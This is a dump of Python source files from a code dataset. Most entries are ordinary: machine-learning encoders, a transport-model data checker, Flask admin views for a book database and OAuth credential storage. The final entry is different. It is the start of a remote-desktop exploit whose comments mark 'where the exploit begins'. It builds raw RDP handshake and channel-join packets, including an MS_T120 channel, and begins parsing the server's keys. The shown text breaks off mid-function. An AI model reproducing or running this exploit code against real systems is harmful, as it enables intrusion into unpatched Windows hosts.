id (string, length 3–8) | content (string, length 100–981k)
---|---
501608 | import os
import warnings
import sys
if sys.version_info[0] == 2:
from ConfigParser import SafeConfigParser
else:
from configparser import SafeConfigParser
__masked__ = False
def set_masked_default(choice):
'Set whether tables should be masked or not by default (True or False)'
global __masked__
__masked__ = choice
filename = os.path.expanduser('~/.atpyrc')
config = SafeConfigParser()
config.read(filename)
if config.has_option('general', 'masked_default'):
if config.getboolean('general', 'masked_default'):
warnings.warn(".atpyrc file found - masked arrays are ON by default")
set_masked_default(True)
else:
warnings.warn(".atpyrc file found - masked arrays are OFF by default")
set_masked_default(False)
|
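For reference, a minimal sketch (not part of the snippet above) of producing the kind of `~/.atpyrc` file this reader looks for; the `general` section and `masked_default` option names come from the code, while the write-out itself is only illustrative:

```python
# Illustrative only: create a sample .atpyrc that the snippet above would pick up.
import os
try:
    from configparser import ConfigParser          # Python 3
except ImportError:
    from ConfigParser import SafeConfigParser as ConfigParser  # Python 2

config = ConfigParser()
config.add_section('general')
config.set('general', 'masked_default', 'true')    # read back via config.getboolean(...)
with open(os.path.expanduser('~/.atpyrc'), 'w') as f:
    config.write(f)
```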
501611 | import torch
from torch import nn
import torch.nn.functional as F
from torch.nn.utils.rnn import pad_sequence, pack_padded_sequence, pad_packed_sequence
from transformers import BertModel, BertConfig
from utils import CMD, MSE
class LanguageEmbeddingLayer(nn.Module):
"""Embed input text with "glove" or "Bert"
"""
def __init__(self, hyp_params):
super(LanguageEmbeddingLayer, self).__init__()
self.hp = hp = hyp_params
if hp.use_bert:
bertconfig = BertConfig.from_pretrained('bert-base-uncased', output_hidden_states=True)
self.bertmodel = BertModel.from_pretrained('bert-base-uncased', config=bertconfig)
else:
self.embed = nn.Embedding(len(hp.word2id), hp.orig_d_l)
def forward(self, sentences, lengths, bert_sent, bert_sent_type, bert_sent_mask):
if self.hp.use_bert:
bert_output = self.bertmodel(input_ids=bert_sent,
attention_mask=bert_sent_mask,
token_type_ids=bert_sent_type)
bert_output = bert_output[0]
# masked mean
# masked_output = torch.mul(bert_sent_mask.unsqueeze(2), bert_output)
# mask_len = torch.sum(bert_sent_mask, dim=1, keepdim=True)
# output = torch.sum(masked_output, dim=1, keepdim=False) / mask_len
return bert_output
else:
# extract features from text modality
output = self.embed(sentences)
return output
class SeqEncoder(nn.Module):
"""Encode all modalities with assigned network. The network will output encoded presentations
of three modalities. The last hidden of LSTM/GRU generates as input to the control module,
while separate sequence vectors are received by the transformer.
TODO: Currently only use one component to encode (coded in "if...else..."). Try to preserve the
interface of both CNN and LSTM/GRU part. In case one approach can not generate satisfying separate vectors.
Then activate both components to generate all outputs.
"""
def __init__(self, hyp_params):
super(SeqEncoder, self).__init__()
self.hp = hp = hyp_params
self.orig_d_l, self.orig_d_a, self.orig_d_v = hp.orig_d_l, hp.orig_d_a, hp.orig_d_v
self.d_l = self.d_a = self.d_v = hp.attn_dim
self.proj_type = hp.proj_type.lower()
def pad_size(ksize, in_size, out_size, stride=1, mode='same'):
if mode.lower() == 'valid': return 0
return (out_size - in_size + ksize - 1) // stride + 1
############################
# TODO: use compound mode ##
############################
if hp.proj_type == 'linear':
self.proj_l = nn.Linear(self.orig_d_l, self.d_l)
self.proj_v = nn.Linear(self.orig_d_v, self.d_v)
self.proj_a = nn.Linear(self.orig_d_a, self.d_a)
self.layer_norm_l = nn.LayerNorm(self.d_l)
self.layer_norm_v = nn.LayerNorm(self.d_v)
self.layer_norm_a = nn.LayerNorm(self.d_a)
elif hp.proj_type == 'cnn':
l_ksize = self.hp.l_ksize
v_ksize = self.hp.v_ksize
a_ksize = self.hp.a_ksize
pad_l = int((l_ksize - 1) / 2)
pad_v = int((v_ksize - 1) / 2)
pad_a = int((a_ksize - 1) / 2)
self.proj_l = nn.Conv1d(self.orig_d_l, self.d_l, kernel_size=l_ksize, padding=pad_l, bias=False)
self.proj_a = nn.Conv1d(self.orig_d_a, self.d_a, kernel_size=a_ksize, padding=pad_a, bias=False)
self.proj_v = nn.Conv1d(self.orig_d_v, self.d_v, kernel_size=v_ksize, padding=pad_v, bias=False)
elif hp.proj_type in ['lstm', 'gru']:
layers = self.hp.num_enc_layers
rnn = nn.LSTM if self.hp.proj_type.lower() == 'lstm' else nn.GRU
#####################################################################
# TODO: 1) Use double layer #
# 2) Keep language unchanged while encoding video and acoustic   #
#####################################################################
self.rnn_l = rnn(self.orig_d_l, self.orig_d_l, layers, bidirectional=True)
self.rnn_v = rnn(self.orig_d_v, self.orig_d_v, layers, bidirectional=True)
self.rnn_a = rnn(self.orig_d_a, self.orig_d_a, layers, bidirectional=True)
self.rnn_dict = {'l':self.rnn_l, 'v':self.rnn_v, 'a':self.rnn_a}
# dict that maps modals to corresponding networks
self.linear_proj_l_h = nn.Linear(2*self.orig_d_l, self.d_l)
self.linear_proj_v_h = nn.Linear(2*self.orig_d_v, self.d_v)
self.linear_proj_a_h = nn.Linear(2*self.orig_d_a, self.d_a)
self.linear_proj_l_seq = nn.Linear(2*self.orig_d_l, self.d_l)
self.linear_proj_v_seq = nn.Linear(2*self.orig_d_v, self.d_v)
self.linear_proj_a_seq = nn.Linear(2*self.orig_d_a, self.d_a)
self.layer_norm_l = nn.LayerNorm(self.d_l)
self.layer_norm_v = nn.LayerNorm(self.d_v)
self.layer_norm_a = nn.LayerNorm(self.d_a)
##################################
## TODO: add activations later ##
##################################
self.activ = None
self.proj_l_h = nn.Sequential(self.linear_proj_l_h, self.layer_norm_l)
self.proj_v_h = nn.Sequential(self.linear_proj_v_h, self.layer_norm_v)
self.proj_a_h = nn.Sequential(self.linear_proj_a_h, self.layer_norm_a)
self.proj_l_seq = nn.Sequential(self.linear_proj_l_seq)
self.proj_v_seq = nn.Sequential(self.linear_proj_v_seq)
self.proj_a_seq = nn.Sequential(self.linear_proj_a_seq)
self.proj_dict_h = {'l':self.proj_l_h, 'v':self.proj_v_h, 'a':self.proj_a_h}
self.proj_dict_seq = {'l':self.proj_l_seq, 'v':self.proj_v_seq, 'a':self.proj_a_seq}
else:
raise ValueError("Encoder can only be cnn, lstm or rnn.")
def forward_rnn_prj(self, input, lengths, modal):
assert modal in "lva"
lengths = lengths.to('cpu').to(torch.int64)
packed_sequence = pack_padded_sequence(input, lengths)
packed_h, h_out = self.rnn_dict[modal](packed_sequence)
padded_h, _ = pad_packed_sequence(packed_h) # (seq_len, batch_size, emb_size)
if self.proj_type == 'lstm':
h_out = h_out[0] # for lstm we don't need the cell state
h_out = torch.cat((h_out[0], h_out[1]), dim=-1)
h_out = self.proj_dict_h[modal](h_out)
h_out_seq = self.proj_dict_seq[modal](padded_h)
return h_out_seq, h_out
def _masked_avg_pool(self, lengths, mask, *inputs):
"""Perform a masked average pooling operation
Args:
lengths (Tensor): sequence lengths, shape (batch_size,)
mask (Tensor): padding mask, shape (batch_size, max_seq_len, 1)
inputs (Tuple[Tensor]): each of shape (batch_size, max_seq_len, embedding)
"""
res = []
for t in inputs:
masked_mul = t * mask # batch_size, seq_len, emb_size
res.append(masked_mul.sum(1)/lengths.unsqueeze(-1))
return res
def forward_enc(self, input_l, input_a, input_v, lengths=None, mask=None):
if lengths is not None:
batch_size = lengths.size(0)
mask = torch.arange(lengths.max()).repeat(batch_size, 1).cuda() < lengths.unsqueeze(-1)
mask = mask.unsqueeze(-1).to(torch.float)
elif mask is not None: # use_bert: derive lengths from the provided attention mask
lengths = mask.sum(1)
if self.hp.use_bert:
input_l = input_l.permute(1, 0, 2)
if self.hp.proj_type == 'linear':
perm = (1, 0, 2)
l_seq = self.proj_l(input_l.permute(*perm)) # (bs, seq_len, attn_size)
v_seq = self.proj_v(input_v.permute(*perm))
a_seq = self.proj_a(input_a.permute(*perm))
l_h, v_h, a_h = self._masked_avg_pool(lengths, mask, l_seq, v_seq, a_seq)
l_seq, v_seq, a_seq = l_seq.permute(*perm), v_seq.permute(*perm), a_seq.permute(*perm)
elif self.proj_type == 'cnn':
perm1 = (1,2,0)
perm2 = (0,2,1)
perm3 = (1,0,2)
# text input: (seq_len x bs x emb_size) -> (bs, emb_size, seq_len)
# output -> (seq_len x bs x emb_size, bs x emb_size)
l_seq = self.proj_l(input_l.permute(*perm1)).permute(*perm2) # bs x seq_len x emb_size
v_seq = self.proj_v(input_v.permute(*perm1)).permute(*perm2)
a_seq = self.proj_a(input_a.permute(*perm1)).permute(*perm2)
# maxpooling to generate output
l_h, v_h, a_h = self._masked_avg_pool(lengths, mask, l_seq, v_seq, a_seq)
l_seq, v_seq, a_seq = l_seq.permute(*perm3), v_seq.permute(*perm3), a_seq.permute(*perm3)
# encode with lstm or gru
elif self.proj_type in ['lstm', 'gru']:
l_seq, l_h = self.forward_rnn_prj(input_l, lengths, modal = 'l')
v_seq, v_h = self.forward_rnn_prj(input_v, lengths, modal = 'v')
a_seq, a_h = self.forward_rnn_prj(input_a, lengths, modal = 'a')
return {'l': (l_seq, l_h), 'v':(v_seq, v_h), 'a':(a_seq, a_h)}
##################################
# TODO: Correct input shapes here
#################################
def forward(self, input_l, input_v, input_a, lengths):
"""Encode Sequential data from all modalities
Params:
@input_l, input_a, input_v (Tuple(Tensor, Tensor)):
Tuple containing input and lengths of input. The vectors are in the size
(seq_len, batch_size, embed_size)
Returns:
@hidden_dic (dict): A dictionary contains hidden representations of all
modalities and for each modality the value includes the hidden vector of
the whole sequence and the final hidden (a.k.a sequence hidden).
All hidden representations are projected to the same size for transformer
and its controller use.
"""
return self.forward_enc(input_l, input_v, input_a, lengths)
class DIVEncoder(nn.Module):
"""Construct a domain-invariant encoder for all modalities. Forward and return domain-invariant
encodings for these modality with similarity and reconstruction (optional) loss.
Args:
in_size (int): hidden size of input vector(s), of which is a representation for each modality
out_size (int): hidden_size
"""
def __init__(self, in_size, out_size, prj_type='linear', use_disc=False,
rnn_type=None, rdc_type=None, p_l=0.0, p_o=0.0):
super(DIVEncoder, self).__init__()
self.prj_type = prj_type
self.reduce = rdc_type
self.use_disc = use_disc
self.in_size = in_size
self.out_size = out_size
if prj_type == 'linear':
self.encode_l = nn.Linear(in_size, out_size)
self.encode_o = nn.Linear(in_size, out_size)
elif prj_type == 'rnn':
self.rnn_type = rnn_type.upper()
rnn = getattr(nn, self.rnn_type)
self.encode_l = rnn(input_size=in_size,
hidden_size=out_size,
num_layers=1,
dropout=p_l,
bidirectional=True)
self.encode_o = rnn(input_size=in_size,
hidden_size=out_size,
num_layers=1,
dropout=p_o,
bidirectional=True)
if use_disc:
self.discriminator = nn.Sequential(
nn.Linear(out_size, 4*out_size),
nn.ReLU(),
nn.Linear(4*out_size, 1),
nn.Sigmoid()
)
self.dropout_l = nn.Dropout(p_l)
self.dropout_o = nn.Dropout(p_o)
def _masked_avg_pool(self, lengths, mask, *inputs):
"""Perform a masked average pooling operation
Args:
lengths (Tensor): Lengths of the input sequences, of size (batch_size,)
mask (Tensor): Padding mask of size (batch_size, max_seq_len) or (batch_size, max_seq_len, 1)
inputs (Tuple[Tensor]): Hidden representations of the input sequences, each of shape (max_seq_len, batch_size, embedding)
"""
res = []
# bert mask only has 2 dimensions
if len(mask.size()) == 2:
mask = mask.unsqueeze(-1)
for t in inputs:
masked_mul = t.permute(1,0,2) * mask # batch_size, seq_len, emb_size
res.append(masked_mul.sum(1)/lengths.unsqueeze(-1)) # batch_size, emb_size
return res
def _forward_rnn(self, rnn, input, lengths):
packed_sequence = pack_padded_sequence(input, lengths.cpu())
packed_h, h_out = rnn(packed_sequence)
padded_h, _ = pad_packed_sequence(packed_h)
return padded_h, h_out
def forward(self, input_l, input_o, lengths, mask):
if self.prj_type == 'linear':
if self.reduce == 'avg':
avg_l, avg_o = self._masked_avg_pool(lengths, mask, input_l, input_o)
elif self.reduce is None:
avg_l, avg_o = input_l, input_o
else:
raise ValueError("Reduce method can be either average or none if projection type is linear")
enc_l = self.encode_l(avg_l)
enc_o = self.encode_o(avg_o)
elif self.prj_type == 'rnn':
out_l, h_l = self._forward_rnn(self.encode_l, input_l, lengths)
out_o, h_o = self._forward_rnn(self.encode_o, input_o, lengths)
if self.reduce == 'last':
h_l_last = h_l[0] if isinstance(h_l, tuple) else h_l
h_o_last = h_o[0] if isinstance(h_o, tuple) else h_o
enc_l = (h_l_last[0] + h_l_last[1]) / 2
enc_o = (h_o_last[0] + h_o_last[1]) / 2
elif self.reduce == 'avg':
enc_l, enc_o = self._masked_avg_pool(lengths, mask, out_l, out_o)
enc_l = (enc_l[:,:enc_l.size(1) // 2] + enc_l[:,enc_l.size(1) // 2:]) / 2
enc_o = (enc_o[:,:enc_o.size(1) // 2] + enc_o[:,enc_o.size(1) // 2:]) / 2
else:
raise ValueError("Reduce method can be either last or average if projection type is linear")
enc_l, enc_o = self.dropout_l(enc_l), self.dropout_o(enc_o)
if self.use_disc:
# generate discriminator output together with its labels
disc_out = self.discriminator(torch.cat((enc_l, enc_o), dim=0)).squeeze() # (2 * batch_size, 1)
batch_size = enc_l.size(0)
disc_labels = torch.cat([torch.Tensor([0]).expand(size=(batch_size,)), \
torch.Tensor([1]).expand(size=(batch_size,))], dim=0).squeeze()
return enc_l, enc_o, disc_out, disc_labels |
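Both `SeqEncoder._masked_avg_pool` and `DIVEncoder._masked_avg_pool` above compute a length-normalized mean over non-padded timesteps. A minimal standalone sketch of that operation on toy tensors (shapes chosen here only for illustration):

```python
# Minimal sketch of masked average pooling: zero out padded positions,
# then divide the per-sample sum by the true sequence length.
import torch

batch_size, max_len, emb = 2, 5, 4
seq = torch.randn(batch_size, max_len, emb)                                  # (batch, seq_len, emb)
lengths = torch.tensor([5, 3])                                               # true lengths per sample
mask = (torch.arange(max_len).unsqueeze(0) < lengths.unsqueeze(1)).float()   # (batch, seq_len)

masked = seq * mask.unsqueeze(-1)                                            # padded steps become zero
pooled = masked.sum(dim=1) / lengths.unsqueeze(-1)                           # (batch, emb)
print(pooled.shape)                                                          # torch.Size([2, 4])
```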
501615 | from easy_select2.utils import apply_select2, select2_modelform, select2_modelform_meta
from easy_select2.widgets import Select2, Select2Mixin, Select2Multiple
__all__ = ['Select2', 'Select2Mixin', 'Select2Multiple', 'apply_select2',
'select2_modelform', 'select2_modelform_meta']
|
501631 | import itertools as it
def longest_consecutive_seq_len(a):
s = set(a)
best_len = 0
for x in a:
if x not in s: continue
current_len = 1
for step in (1, -1):
for i in it.count(x+step, step):
if i in s: current_len += 1
else: s -= set(range(x, i, step)); break
best_len = max(best_len, current_len)
return best_len
|
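A quick sanity check of the function above (a sketch assuming `longest_consecutive_seq_len` is in scope):

```python
# The longest consecutive run in [100, 4, 200, 1, 3, 2] is 1,2,3,4 -> length 4.
assert longest_consecutive_seq_len([100, 4, 200, 1, 3, 2]) == 4
assert longest_consecutive_seq_len([]) == 0
assert longest_consecutive_seq_len([7]) == 1
```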
501656 | import os
import pandas as pd
import openmatrix as omx
import numpy as np
import argparse
parser = argparse.ArgumentParser(description='check activitysim raw_data')
parser.add_argument('raw_data_directory', metavar='raw_data_directory', type=str, nargs=1,
help=f"path to raw data directory")
parser.add_argument('-o', '--output',
type=str,
metavar='PATH',
help='path to output dir')
args = parser.parse_args()
input_dir = args.raw_data_directory[0]
output_dir = args.output
print(f"input_dir {input_dir}")
print(f"output_dir {output_dir}")
def input_path(file_name):
return os.path.join(input_dir, file_name)
def output_path(file_name):
return os.path.join(output_dir, file_name)
def integerize_id_columns(df, table_name):
columns = ['MAZ', 'OMAZ', 'DMAZ', 'TAZ', 'zone_id', 'household_id', 'HHID']
for c in df.columns:
if c in columns:
bad = ~(df[c] == df[c].astype(int))
if bad.any():
print(f"\n### OOPS ### table {table_name} bad integer column {c}\n")
df[c] = df[c].astype(int)
def read_csv(file_name, integerize=True):
df = pd.read_csv(input_path(file_name))
print(f"read {file_name} {df.shape}")
return df
def to_csv(df, file_name):
print(f"writing {file_name} {df.shape} {output_path(file_name)}")
df.to_csv(output_path(file_name), index=False)
def report_baddies(df, tag, fatal=False):
if len(df) > 0:
print(f"\n### OOPS ### {len(df)} {tag}\n")
# print(f"\n{df}\n")
if output_dir:
file_name = f"{tag}.csv"
print(f"writing {tag} {df.shape} to {output_path(file_name)}")
df.to_csv(output_path(file_name), index=False)
if fatal:
raise RuntimeError(tag)
else:
print(f"{len(df)} {tag}")
print(f"input_dir {input_dir} output_dir {output_dir}")
if output_dir and not os.path.isdir(output_dir):
print(f"creating output directory {output_dir}")
os.mkdir(output_dir)
land_use = read_csv("land_use.csv")
# ### check maz.csv against land_use
land_use = land_use.sort_values('MAZ')
maz = read_csv("maz.csv").sort_values('MAZ')
# fatal
missing = land_use.MAZ[~land_use.MAZ.isin(maz.MAZ)]
report_baddies(missing, 'land_use_MAZ_not_in_maz_MAZ', fatal=True)
missing = maz.MAZ[~maz.MAZ.isin(land_use.MAZ)]
report_baddies(missing, 'maz_MAZ_not_in_land_use_MAZ')
# fatal
missing = land_use.TAZ[~land_use.TAZ.isin(maz.TAZ)]
report_baddies(missing, 'land_use_TAZ_not_in_maz_TAZ', fatal=True)
missing = maz.TAZ[~maz.TAZ.isin(land_use.TAZ)]
report_baddies(missing, 'maz_TAZ_not_in_land_use_TAZ')
# ### check taz.csv against land_use
land_use = land_use.sort_values('TAZ')
taz = read_csv("taz.csv").sort_values('TAZ')
if output_dir:
taz.to_csv(output_path('taz.csv'), index=False)
# fatal
missing = land_use.TAZ[~land_use.TAZ.isin(taz.TAZ)]
report_baddies(missing, 'land_use_TAZ_not_in_taz_TAZ', fatal=True)
missing = taz.TAZ[~taz.TAZ.isin(land_use.TAZ)]
report_baddies(missing, 'taz_TAZ_not_in_land_use_TAZ')
# #########
#
# maz
#
maz = read_csv("maz.csv").sort_values(['MAZ', 'TAZ'])
maz = maz[maz["MAZ"].isin(land_use.MAZ)]
integerize_id_columns(maz, 'maz')
assert (land_use.MAZ.isin(maz.MAZ).all())
assert (land_use.TAZ.isin(maz.TAZ).all())
assert (maz.TAZ.isin(land_use.TAZ).all())
#
# taz
#
taz = read_csv("taz.csv").sort_values(['TAZ'])
taz = taz[taz["TAZ"].isin(land_use.TAZ)]
integerize_id_columns(taz, 'taz')
assert (land_use.TAZ.isin(taz.TAZ).all())
# print(maz.shape)
# print(f"MAZ {len(maz.MAZ.unique())}")
# print(f"TAZ {len(maz.TAZ.unique())}")
#
# households
#
households = read_csv("households.csv")
missing = households[~households["MAZ"].isin(maz.MAZ)]
report_baddies(missing, 'household_MAZ_not_in_maz_MAZ')
integerize_id_columns(households, 'households')
#
# persons
#
persons = read_csv("persons.csv")
orphans = persons[~persons["household_id"].isin(households.HHID)]
report_baddies(orphans, 'persons_not_in_households')
households = households[households["MAZ"].isin(maz.MAZ)]
orphans = persons[~persons["household_id"].isin(households.HHID)]
report_baddies(orphans, 'persons_not_in_households_in_maz_MAZ')
integerize_id_columns(persons, 'persons')
#
# maz_to_maz_walk and maz_to_maz_bike
#
m2m = read_csv("maz_to_maz_walk.csv")
missing = m2m[~(m2m.OMAZ.isin(maz.MAZ) & m2m.DMAZ.isin(maz.MAZ))]
report_baddies(missing, 'maz_to_maz_walk_OMAZ_or_DMAZ_not_in_maz_MAZ')
integerize_id_columns(m2m, "maz_to_maz_walk")
m2m = read_csv("maz_to_maz_bike.csv")
missing = m2m[~(m2m.OMAZ.isin(maz.MAZ) & m2m.DMAZ.isin(maz.MAZ))]
report_baddies(missing, 'maz_to_maz_bike_OMAZ_or_DMAZ_not_in_maz_MAZ')
integerize_id_columns(m2m, "maz_to_maz_bike")
#
# skims
#
omx_infile_name = 'skims.omx'
skim_data_type = np.float32
omx_in = omx.open_file(input_path(omx_infile_name), 'r')
print(f"omx_in shape {omx_in.shape()}")
print(f"{len(omx_in.listMappings())} mappings in skims")
for m in omx_in.listMappings():
print(f"found mapping '{m}' in skims")
assert len(omx_in.listMappings()) == 0
# assert omx_in.shape() == (len(taz), len(taz))
omx_in.close()
|
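The core cross-check pattern in this script is `isin` plus `report_baddies`. A toy, self-contained sketch of that pattern (frame contents here are made up for the example):

```python
# Toy illustration of the MAZ cross-check pattern used above.
import pandas as pd

land_use = pd.DataFrame({'MAZ': [1, 2, 3], 'TAZ': [10, 10, 20]})
maz = pd.DataFrame({'MAZ': [1, 2], 'TAZ': [10, 10]})

missing = land_use.MAZ[~land_use.MAZ.isin(maz.MAZ)]
print(len(missing), "land_use MAZ ids missing from maz")   # 1 (MAZ 3)
```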
501694 | import paginate
import requests
from bs4 import BeautifulSoup
from flask import request, url_for, render_template, jsonify, flash
from flask.views import MethodView
from flask_login import login_required
from paginate_sqlalchemy import SqlalchemyOrmWrapper
from sqlalchemy import desc
from nanumlectures.common import is_admin_role, paginate_link_tag
from nanumlectures.database import db_session
from nanumlectures.models import Books, Roundtable
from nanumlectures.settings import SOCIAL_AUTH_NAVER_KEY, SOCIAL_AUTH_NAVER_SECRET
class BooksListView(MethodView):
decorators = [is_admin_role, login_required]
def get(self):
current_page = request.args.get("page", 1, type=int)
search_option = request.args.get("search_option", '')
search_word = request.args.get("search_word", '')
if search_option and search_option in ['books_title']:
search_column = getattr(Books, search_option)
if search_option == "roundtable_num" and search_word and not search_word.isdecimal():
flash('개최회차는 숫자만 입력하셔야 합니다.')
search_word = None
page_url = url_for("admin.books")
if search_word:
page_url = url_for("admin.books", search_option=search_option, search_word=search_word)
page_url = str(page_url) + "&page=$page"
else:
page_url = str(page_url) + "?page=$page"
items_per_page = 10
records = db_session.query(Books).join(Roundtable)
if search_word:
if search_option == 'roundtable_num':
records = records.filter(Roundtable.roundtable_num == search_word)
else:
records = records.filter(search_column.ilike('%{}%'.format(search_word)))
records = records.order_by(desc(Books.id))
total_cnt = records.count()
paginator = paginate.Page(records, current_page, page_url=page_url,
items_per_page=items_per_page,
wrapper_class=SqlalchemyOrmWrapper)
return render_template("admin/books.html", paginator=paginator,
paginate_link_tag=paginate_link_tag,
page_url=page_url, items_per_page=items_per_page,
total_cnt=total_cnt, page=current_page)
class BooksRegView(MethodView):
decorators = [is_admin_role, login_required]
def get(self):
# Collect only the roundtable numbers (for validation)
roundtable = map(lambda x: x[0], db_session.query(Roundtable.roundtable_num))
return render_template("admin/books_reg.html", roundtable=roundtable)
def post(self):
req_json = request.get_json()
# Add a new book record
books_obj = Books()
books_obj.roundtable = db_session.query(Roundtable).filter(
Roundtable.roundtable_num == req_json.get('roundtable_num')).first()
books_obj.books_title = req_json.get('booksTitle')
books_obj.books_link = req_json.get('booksLink')
books_obj.books_isbn = req_json.get('booksISBN')
books_obj.books_date = req_json.get('booksDate')
books_obj.books_company = req_json.get('booksCompany')
books_obj.books_body = req_json.get('booksBody')
books_obj.books_bookshop = req_json.get('shopLink')
db_session.add(books_obj)
return jsonify(success=True)
class BooksEditView(MethodView):
decorators = [is_admin_role, login_required]
def get(self, book):
# Collect only the roundtable numbers (for validation)
roundtable = map(lambda x: x[0], db_session.query(Roundtable.roundtable_num))
return render_template("admin/books_edit.html", book=book, roundtable=roundtable)
def post(self, book):
req_json = request.get_json()
# Update the book record
book.roundtable = db_session.query(Roundtable).filter(
Roundtable.roundtable_num == req_json.get('roundtable_num')).first()
book.books_title = req_json.get('booksTitle')
book.books_link = req_json.get('booksLink')
book.books_isbn = req_json.get('booksISBN')
book.books_date = req_json.get('booksDate')
book.books_company = req_json.get('booksCompany')
book.books_body = req_json.get('booksBody')
book.books_bookshop = req_json.get('shopLink')
return jsonify(success=True)
class BooksDetailView(MethodView):
decorators = [is_admin_role, login_required]
def get(self, book):
return render_template("admin/books_view.html", book=book)
def delete(self, book):
db_session.delete(book)
return jsonify(success=True)
def date_simple_format(text):
return "{}-{}-{}".format(text[0:4], text[4:6], text[6:])
class BookFindNaverAPI(MethodView):
decorators = [is_admin_role, login_required]
def get(self):
headers = {
'X-Naver-Client-Id': SOCIAL_AUTH_NAVER_KEY,
'X-Naver-Client-Secret': SOCIAL_AUTH_NAVER_SECRET
}
r = requests.get('https://openapi.naver.com/v1/search/book_adv.xml?d_isbn=' + request.args.get('isbn'),
headers=headers)
book_info = BeautifulSoup(r.content.decode("utf-8"), "lxml")
link_aladin_req = requests.get(
"https://openapi.naver.com/v1/search/webkr.json?query={}".format("알라딘 " + request.args.get('isbn')),
headers=headers)
link_yes24_req = requests.get(
"https://openapi.naver.com/v1/search/webkr.json?query={}".format("예스24 " + request.args.get('isbn')),
headers=headers)
link_ypbooks_req = requests.get(
"https://openapi.naver.com/v1/search/webkr.json?query={}".format("영풍문고 " + request.args.get('isbn')),
headers=headers)
aladin_link = tuple(filter(lambda x: 'www.aladin.co.kr' in x["link"], link_aladin_req.json()["items"]))
yes24_link = tuple(filter(lambda x: 'www.yes24.com' in x["link"], link_yes24_req.json()["items"]))
ypbook_link = tuple(filter(lambda x: 'www.ypbooks.co.kr' in x["link"], link_ypbooks_req.json()["items"]))
return jsonify(title=book_info.find("item").title.text,
image=book_info.find("item").image.text,
author=book_info.find("item").author.text,
pubdate=date_simple_format(book_info.find("item").pubdate.text),
description=book_info.find("item").description.text,
publisher=book_info.find("item").publisher.text,
store_link=dict(
aladin=aladin_link and aladin_link[0]["link"],
yes24=yes24_link and yes24_link[0]["link"],
ypbook=ypbook_link and ypbook_link[0]["link"])
)
|
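These `MethodView` classes are registered as routes elsewhere in the project; a minimal sketch of how such views are typically wired up (URL rules and endpoint names below are assumptions, and the detail/edit views receive an already-loaded `Books` object, which implies a model-loading URL converter in the real app):

```python
# Hypothetical registration sketch, not taken from this project's blueprint.
from flask import Flask

app = Flask(__name__)
app.add_url_rule('/admin/books', view_func=BooksListView.as_view('books'))
app.add_url_rule('/admin/books/reg', view_func=BooksRegView.as_view('books_reg'))
```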
501711 | import threading
from oauth2client.client import Storage as BaseStorage
from oauth2client.client import Credentials
from oauth2client.anyjson import simplejson
def from_dict(container):
"""
Create a Credentials object from a dictionary.
The dictionary is first converted to JSON by the native implementation
to ensure it is converted correctly and make updates to the oauth2client module
easier.
"""
jsonRepr = simplejson.dumps(container)
return Credentials.new_from_json(jsonRepr)
def to_dict(credentials):
"""
Convert a Credentials object to a dictionary.
The Credentials object is first converted to JSON by the native implementation
to ensure it is converted correctly and make updates to the oauth2client module
easier.
"""
jsonRepr = credentials.to_json()
dictRepr = simplejson.loads(jsonRepr)
return dictRepr
class DictStorage(BaseStorage):
"""
Storage implementation for storing credentials inside an existing dictionary object.
"""
def __init__(self, container, key='credentials'):
if not isinstance(container, dict):
raise Exception('Container must be an instance of a dict')
self._container = container
self._key = key
self._lock = threading.Lock()
def locked_get(self):
"""Retrieve Credential from Config.
Returns:
oauth2client.client.Credentials
"""
credentials = None
try:
credentials = from_dict(self._container[self._key])
except KeyError:
pass
return credentials
def locked_put(self, credentials):
"""Write Credentials to the Config.
Args:
credentials: Credentials, the credentials to store.
"""
d = to_dict(credentials)
self._container[self._key] = d
def locked_delete(self):
"""Delete Credentials from Config.
"""
del self._container[self._key] |
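A usage sketch, assuming `oauth2client` is installed and `DictStorage` is in scope; the base `Storage` class exposes `put()`, `get()` and `delete()`, which wrap the `locked_*` methods above:

```python
# Sketch: round-trip credentials through a plain dict.
from oauth2client.client import AccessTokenCredentials

container = {}
storage = DictStorage(container, key='credentials')

creds = AccessTokenCredentials('dummy-token', 'example-agent/1.0')  # stand-in credentials
storage.put(creds)        # serialises into container['credentials']
restored = storage.get()  # back to an oauth2client Credentials object (or None)
storage.delete()          # removes the entry again
```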
501738 | import binascii
import string
import random
import struct
import time
from OpenSSL import *
from Crypto.PublicKey.RSA import construct
import rdp_crypto
def connect_req(name):
packet = binascii.unhexlify('0300002e29e00000000000436f6f6b69653a206d737473686173683d')
packet += name #1
packet += binascii.unhexlify('0d0a0100080000000000')
return packet
# initial mcs connect pdu this is where the exploit begins
def mcs_connect_init_pdu():
packet = (
'030001be02f0807f658201b20401010401010101ff30200202002202020002020200000202000102020000020200010202ffff020200023020020200010202000102020001020200010202000002020001020204200202000230200202ffff0202fc170202ffff0202000102020000020200010202ffff020200020482013f000500147c00018136000800100001c00044756361812801c0d800040008002003580201ca03aa09040000280a00006b0061006c00690000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca0100000000001800070001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004c00c00090000000000000002c00c00030000000000000003c03800040000007264706472000000000000c0726470736e640000000000c04d535f5431323000808000004d535f543132300080800000'
)
return binascii.unhexlify(packet)
def erect_domain_req():
packet = ( '0300000c02f0800400010001' )
return binascii.unhexlify(packet)
def attach_user_req():
packet = ( '0300000802f08028' )
return binascii.unhexlify(packet)
# channel join request packets
def get_chan_join_req():
packet = ( '0300000c02f08038000703' )#was 0503
start = 'eb'
channels = []
for c in range(0, 6): #4
channelid = int(start, 16) + c
channel = packet + format(channelid, 'x')
channels.append(channel)
return channels
# parse the mcs connection resp (in wireshark as ServerData) packet.
# returns an rsa pubkey object and the server random data used later to
# generate session encryption keys
def parse_mcs_conn_resp(packet):
# 4.1.4 Server MCS Connect Response PDU with GCC Conference Create Response
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/d23f7725-876c-48d4-9e41-8288896a19d3
# 2.2.1.4.3.1.1.1 RSA Public Key (RSA_PUBLIC_KEY)
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/fe93545c-772a-4ade-9d02-ad1e0d81b6af
# all the next slicing makes sense when looking at above two links
# find headerType serverSecurityData (0x0c02)
header_offset = packet.find(b'\x02\x0c')
sec_data = packet[header_offset:]
ran_len = int.from_bytes(sec_data[12:12+4], byteorder='little')
server_ran = sec_data[20:20+ran_len]
# magic number
server_cert_offset = packet.find(b'\x52\x53\x41\x31')
server_cert = packet[server_cert_offset:]
key_len = int.from_bytes(server_cert[4:8], byteorder='little')
